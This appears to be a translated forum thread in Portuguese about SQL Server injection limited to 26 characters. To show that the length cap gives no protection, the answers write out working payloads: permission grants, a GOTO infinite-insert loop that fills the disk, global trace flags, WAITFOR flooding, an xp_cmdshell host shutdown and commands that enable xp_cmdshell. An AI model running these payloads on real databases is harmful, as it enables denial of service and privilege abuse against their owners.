Injeção do SQL Server - quanto dano em 26 caracteres?

Fácil:

GRANT EXECUTE TO LowlyDBA

Ou, eu acho que neste caso seria

grant execute to lowlydba 

Faça a sua escolha de variações sobre isso.

Com toda a probabilidade, você pode testar isso agora em relação ao seu sistema atual, mas qualquer número de pequenas alterações no banco de dados ao longo do tempo pode invalidar seu teste. A cadeia de caracteres pode mudar, alguém pode criar um procedimento armazenado em minúsculas que tenha potencial destrutivo - qualquer coisa. Você nunca pode dizer com 100% de confiança que não há um ataque destrutivo de 26 caracteres que alguém possa construir.

Sugiro que você encontre uma maneira de fazer com que o desenvolvedor siga as práticas recomendadas básicas de segurança padrão do setor, mesmo que apenas para seu próprio bem, como alguém que presumo ser pelo menos parcialmente responsável caso ocorram violações de segurança.

Editar:

E por malícia/diversão, você pode tentar habilitar todos os sinalizadores de rastreamento. Isso seria interessante de observar. Parece que um post de blog que Brent Ozar faria...

DBCC TRACEON(xxxx, -1)

O SHUTDOWNcomando ou KILLCommand (escolha um número aleatório acima de 50) levam significativamente menos de 26 caracteres, embora a conta que executa as consultas do aplicativo não tenha permissões suficientes para executá-las.

Você pode criar uma tabela que você preenche até o fim do tempo ou o espaço em disco se esgote, o que ocorrer primeiro.

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

Dependendo da sua definição de dano, você pode executar isto: WAITFOR DELAY '23:59' Para ser realmente mau, você pode usar uma ferramenta de teste de carga para executar isso em 32.768 clientes.

Variação baseada na resposta de @MikaelEriksson e na resposta de @MartinSmith ao meu comentário inicial:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

Inicialmente eu tentei fazer uma declaração WHILE, mas o melhor que consegui fazer foram 27 caracteres:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

Mas Martin apontou GOTO:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

GOTO... a raiz de todo mal e criador de uma declaração de inserção de loop infinito em 26 caracteres.

Com isso dito... pode ser vantajoso ficar com CHAR(99) em vez de int, pois isso usaria mais espaço. Outras opções usam nomes mais longos e esmagariam o limite de 26 caracteres... ou usariam menos espaço de armazenamento por linha.

Código de teste completo:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

XP_CMDSHELL 'SHUTDOWN -PF'

Dependendo de quão prejudicial você considera ser um desligamento. :-)

Isso requer que xp_cmdshell esteja habilitado no servidor, algo que não é o caso das últimas versões do SQL Server. Também requer que a conta de serviço tenha o direito de desligamento, que pode ou não ter.

A ativação do xp_cmdshell provavelmente ultrapassa o limite de 26 caracteres. Você permitiria múltiplas injeções?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE